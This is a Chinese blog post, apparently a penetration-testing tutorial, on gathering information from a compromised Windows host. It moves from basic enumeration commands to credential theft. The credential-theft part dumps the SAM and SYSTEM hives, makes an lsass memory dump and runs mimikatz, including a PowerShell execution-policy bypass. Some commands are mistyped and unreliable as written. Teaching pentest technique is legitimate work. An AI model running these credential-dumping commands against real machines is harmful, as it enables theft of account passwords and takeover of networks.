内网渗透----Windows下信息收集

最新推荐文章于 2024-03-25 08:15:00 发布
最新推荐文章于 2024-03-25 08:15:00 发布
阅读量2.1k 收藏 10
点赞数 1
分类专栏: # 内网技巧 文章标签: Windows下信息收集
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36374896/article/details/84261162
版权

一、基础信息收集

使用systeminfo命令查看操作系统版本、架构、补丁情况
在这里插入图片描述

Windows-Exploit-Suggester-master
-u 参数升级并将数据库下载至本地:
在这里插入图片描述
-i 参数指定系统信息文件;-d 参数指定本地数据库文件,提示需安装xlrd读取Excel文件:
在这里插入图片描述
pip安装模块:
在这里插入图片描述
再次运行,成功:
在这里插入图片描述
使用Whomai、net user查看用户信息
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

使用net localgroup查看本地用户组
在这里插入图片描述
使用net localgroup “组名”来查看用户组信息
在这里插入图片描述
使用net accounts查看密码策略
在这里插入图片描述
使用query user查看最近登录信息
在这里插入图片描述
使用ipconfig查看网络适配器信息
在这里插入图片描述
使用ipconfig /all查看所有适配器
在这里插入图片描述
使用ipconfig /displaydns 查看dns缓存
在这里插入图片描述
使用net use 查看网络连接
在这里插入图片描述
使用netstat查看网络服务
在这里插入图片描述
使用netstat -ano 查看开启的端口
在这里插入图片描述
使用route print 查看路由信息
在这里插入图片描述
使用arp -a 查看arp缓存
在这里插入图片描述

二、凭证收集

导出sam数据库中的密码

方法1:以管理员权限运行cmd,输入以下命令



reg save hklm\sam c:\sam.hive
reg save hklm\system c:\system.hive

方法2:使用powershell


powershell -exec bypass
Import-Module .\invoke-ninjacopy.ps1
Invoke-NinjaCopy -Path C:\Windows\System32\config\SAM -LocalDestination .\sam.hive
Invoke-NinjaCopy -Path   C:\Windows\System32\config\SYSTEM -LocalDestination .\system.hive

将生成的sam.hive与system.hive转至本地,使用saminside或cain导入
saminside
在这里插入图片描述
结果如下
在这里插入图片描述
cain
在这里插入图片描述

离线提取lsass进程
  • Vista及以上的系统可以打开任务管理器,选择显示所有用户的进程,找到1sass进程后右键创建转储文件
  • procdump.exe
procdump.exe-ma lsass.exe lsass.dmp

获取到内存转储文件后,就可以使用mimikatz来提取密码。这里需要注意的是运行mimikatz平台架构要与进行转储的系统兼容。命令如下:

sekurlsa::minidump lsass.dmp
sekurlsa:logonpasswords
在线凭证收集

Mimikatz
Mimikatz项目地址:

https://github.com/gentilkiwi/mimikatz

功能:抓取lsass进程中的密码,提取sam数据库中的密码,提取chrome凭据,提取证书,支持pass-the-hash、pass-the-ticket等攻击方式,功能非常强大

privilege::debug
sekurlsa::logonPasswords full

Powershell版Mimikatz
项目地址:

https://github.com/PowershellMafia/Powersploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1

可以通过powershell下载执行来运行

powershell -exec bypass  Import-Module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonPasswords full"'
浅笑⁹⁹⁶
关注
  • 1
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Windows-Exploit-Suggester-master
03-20
Windows-Exploit-Suggester-master
漏洞利用EXP windows-kernel-exploits-master.zip
03-10
本地溢出提权首先要有服务器的一个普通用户权限,攻击者通常会向服务器上传本地溢出程序,在服务器端执行,如果系统存在漏洞,那么将溢出Administrator权限。以下是不同系统提权的漏洞和相应的补丁。
内网渗透(三)Windows域环境的搭建
最新发布
03-25 532
内网渗透(三)Windows域环境的搭建的详细步骤。
服务器2008系统提权工具,Windows下提权辅助工具Windows-Exploit-Suggester
weixin_39962341的博客
08-05 722
【51CTO.com原创稿件】一、Windows-Exploit-Suggester简介1. 简介Windows-Exploit-Suggester是受Linux_Exploit_Suggester的启发而开发的一款提权辅助工具,其官方下载地址:https://github.com/GDSSecurity/Windows-Exploit-Suggester,它是用python开发而成,运行环境是p...
浅析Windows域环境身份认证与攻击思路
道阻且长,行则将至。
06-30 1924
文章目录前言Kerberos 协议 前言 上一篇文章 内网渗透-Windows域环境的初识与搭建 介绍了 Windows 域环境的基础概念和域环境的搭建演示,通过前面的学习也了解到,Windows 系统在工作组上你一切的设置在本机上进行包括各种策略,用户登录也是登录在本机的,密码是放在本机的数据库来验证的。而如果你的计算机加入域的话,各种策略是域控制器统一设定,用户名和密码也是放到域控制器去验证,也就是说你的账号密码可以在同一域的任何一台计算机登录。 也就是说,Windows 用户登录到域中的时候,身份验证
内网渗透windows
qq_63980959的博客
04-05 2335
Impacket是用于处理网络协议的Python类的集合。Impacket专注于提供对数据包的简单编程访问,以及协议实现本身的某些协议(例如SMB1-3和MSRPC)。数据包可以从头开始构建,也可以从原始数据中解析,而面向对象的API使处理协议的深层次结构变得简单。该库提供了一组工具,作为在此库找到可以执行的操作的示例。
玩转 Linux中的用户管理!!!
weixin_45931409的博客
04-15 420
1 用户及用户组存在的意义 1)用户存在的意义 系统资源是有限的,如何合理分配系统资源? 在这个问题解决时必须要有连个资源配合 1.身份 account 2.授权 author 3.认证 auth 3A机制,3A机制组成系统中最底层的安全架构 2)用户组存在意义 用户组是一个逻辑容器 对用户进行归类和统一授权 2.用户及用户组在系统中的存在方式 电脑对数字敏感 id 人类对字...
Linux系统中的用户管理
weixin_68585241的博客
04-04 1143
1.用户涉及到的系统配置文件 /etc/passwd 用户身份信息文件 /etc/group 组身份文件信息 /etc/skel/.* 用户环境配置文件模板 /etc/shadow 用户认证信息文件 /home/username ...
Linux用户权限管理
qq_37801888的博客
04-12 287
Linux用户权限管理用户切换用户查看用户切换用户涉及到的系统配置文件用户和用户组建立及删除用户和用户组的信息管理用户认证信息管理 /etc/shadow用户名称用户权力下放 用户切换 用户查看 whomai 查看当前用户 id 查看用户id信息 -u 查看用户的用户id -g 查看用户主组id -G 查看用户所有的组的id -n 显示名称 用户id范围: 0-65535 0:Linux 超级用户ID 1-999 Liunx系统自用ID 1000-65535 用户级ID ¥
linux基本指令(上)
qq_62939852的博客
11-10 4019
使用 cd ~ 后 ,使目录 从 /root/9.9/lesson2/dir 到 /root目录中。在 根目录root下的9.9目录中,有一个666.txt的文件 ,一个 lesson2的目录。我们不难发现 ,上面为空的file.txt文件 与 下面有内容的file.txt文件。此时我们发现,使用cd …在 /root/9.9目录下,通过 cd . . 不停的返回上一级目录 ,首先 ,处于 root下的 9.9目录下的 lesson2目录。cd .前后目录没有变化,依旧在root下的9.9目录上。
Linux基本命令(1)__2018.04.14
weixin_40316053的博客
04-14 207
1.nm命令。用途显示关于对象文件、可执行文件以及对象文件库里的符号信息。描述nm 命令显示关于指定 File 中符号的信息,文件可以是对象文件、可执行文件或对象文件库。如果文件没有包含符号信息,nm 命令报告该情况,但不把它解释为出错条件。 nm 命令缺省情况下报告十进制符号表示法下的数字值。nm 命令使用以下符号(用同样的字符表示弱符号作为全局符号)之一来表示文件符号类型:A    Globa...
红蓝对抗之Windows内网渗透-腾讯SRC出品1
08-03
1.2、端口连接 1.3、配置文件 1.4、用户信息 1.5、内网主机发现 1.6、会话收集 1.7、凭据收集 1.9、域信任 1.10、域传送 1.11、DN
[HACK学习呀] - 2020-08-23 内网渗透 - 内网中的信息收集1
08-03
=域特征=[需要域用户才能成功查询]工作组内信息收集工作组采取的一般都是常规渗透方法,因为工作组一般都是个人和少数服务器通常使用的方法有:扫描网段中的web服务
无涯-20230604-社会工程学
02-19
红队之windows信息收集思路.pdf 红队印象:柳暗花明+收米跑路.pdf 红队信息收集到打点.pdf 红队小技巧5.pdf 红队印象:柳暗花明+收米跑路.pdf 红队信息收集到打点.pdf 红队小技巧.pdf 红队实战攻防技术(一).pdf 红队...
sec-interview:信息安全面试题汇总
07-24
内网渗透 安全研发 甲方安全运营 渗透测试 如何绕过CDN找到真实IP,请列举五种方法 (★★★) redis未授权访问如何利用,利用的前提条件是? (★★★) mysql提权方式有哪些?利用条件是什么? (★) windows+mysql,...
Cobalt-Strike-4.7
12-27
Cobalt Strike 是一款使用java编写,C / S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟对抗,进行内网渗透,是一个为对手模拟和红队行动而设计的平台,主要用于执行有目标的攻击和模拟高级威胁者的后...
内网渗透----Linux下信息收集
浅笑996的博客
12-04 4401
1.系统类型 cat /etc/issue查看系统名称 Lsb-release查看系统名称、版本号 2. 内核版本 uname –a 查看所有信息 ls /root |grep vmlinuz 3. 进程 ps aux 查看进程信息 ps –ef查看进程信息 4. 安装的软件包 使用dpkg –l查看安装的软件包 5. 服务配置 查看apache配置文件 6. 网络...
内网渗透----Token 窃取与利用
浅笑996的博客
12-03 2186
0x00 前言 在之前的文章《渗透技巧——程序的降权启动》介绍了使用 SelectMyParent 降权的方法,本质上是通过 token 窃取实现的。这一次将要对 token 窃取和利用做进一步介绍,测试常用工具,分享利用技巧。 0x01 简介 本文将要介绍以下内容 ; · Token 简介 · Metasploit 中的 incognito · Windows 平台下的 incognito · ...
内网渗透--ICMP隧道
05-16
对于内网渗透而言,ICMP隧道可以用于将攻击者的数据从受害主机中转出,绕过防火墙和其他网络安全设备的检测和过滤。 ICMP隧道的实现需要两个端点:一个客户端和一个服务器端。客户端将要传输的数据封装在ICMP数据包...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值